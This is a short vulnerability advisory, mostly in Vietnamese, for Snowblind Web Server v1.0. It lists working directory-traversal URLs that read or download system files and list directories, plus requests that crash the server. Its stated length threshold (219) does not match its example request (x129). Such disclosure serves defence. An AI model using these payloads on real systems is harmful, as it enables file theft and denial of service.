topic: Snowblind Web Server: multiple issues
product: Snowblind Web Server v1.0
vendor: www.snowblind.net
risk: high
date: 05/16/2k3
tested platform: Windows 98 Second Edition
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
Mô tả:
Có 2 lỗi : directory traversal và DoS attacks.
directory traversal
1. Bạn có thể đọc hay download bất kỳ file nào ở thư mục gốc của site:
+http://hostname/../../windows/system.ini
hoặc
+http://hostname/internal.sws?../../windows/system.ini
2. bạn cũng có thể download bất kỳ file binary nào:
+http://hostname/internal.sws?../../windows/calc.exe
yêu cầu này sẽ download file chương trình calc.exe với cái tên là internal.sws
+http://hostname/internal.sws?sws.exe
download webserver itself )).
3. Liệt kê thư mục của webroot.
chú ý: bug này sẽ hoạt động nếu 'Allow directory listings' được bật lên [ mặc
định đã như thế rồi ].
+http://hostname/.../
sẽ in ra nội dung của thư mục root ở ổ đĩa của servẻ.
Denial of Service
1. url này sẽ crash webserver:
+http://localhost/</
2. nếu bạn gửi yêu cầu GET, mà có chứa hơn >=219 ký tự, thì sẽ crash server..
ví dụ yêu cầu:
GET /fff[ x 129 ]ffff HTTP/1.0
